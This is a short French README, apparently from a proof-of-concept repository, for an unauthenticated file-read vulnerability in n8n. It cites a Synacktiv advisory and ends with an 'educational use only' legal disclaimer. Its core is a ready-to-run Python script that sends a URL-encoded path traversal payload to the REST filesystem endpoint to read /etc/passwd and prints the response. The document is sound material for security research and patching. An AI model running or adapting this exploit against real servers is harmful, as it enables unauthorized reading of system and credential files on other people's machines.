
Cette vulnérabilité permet une lecture anonyme de fichiers dans n8n.
import requests
url = "https://example.com/rest/data/filesystem:..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd:.svg"
response = requests.get(url)
print(response.status_code)
print(response.headers)
print(response.text)
https://www.synacktiv.com/sites/default/files/2023-05/Synacktiv-N8N-Multiple-Vulnerabilities_0.pdf
La preuve de concept (PoC) fournie dans ce dépôt est uniquement destinée à des fins éducatives et de recherche en sécurité. Les informations et le code sont destinés à être utilisés par des professionnels de la cybersécurité et des chercheurs afin de comprendre et de se protéger contre les vulnérabilités des logiciels et des systèmes. Toute utilisation de cette PoC, des informations ou du code associé pour attaquer des cibles sans consentement préalable mutuel est illégale et strictement interdite.
En utilisant cette PoC, vous acceptez de comprendre l'impact potentiel de la vulnérabilité qu'elle démontre et de l'utiliser de manière responsable et éthique. Les auteurs de cette PoC déclinent toute responsabilité en cas d'utilisation abusive de ce matériel ou de tout dommage pouvant résulter de l'utilisation des informations et du code fournis. Il incombe à l'utilisateur final de respecter toutes les lois locales, nationales et internationales applicables.
Les auteurs ont déployé tous les efforts possibles pour garantir l'exactitude et la fiabilité des informations fournies dans ce dépôt. Cependant, les informations sont fournies "en l'état" sans garantie d'aucune sorte. Les auteurs n'acceptent aucune responsabilité quant à l'exactitude, le contenu, l'exhaustivité, la légalité ou la fiabilité des informations contenues.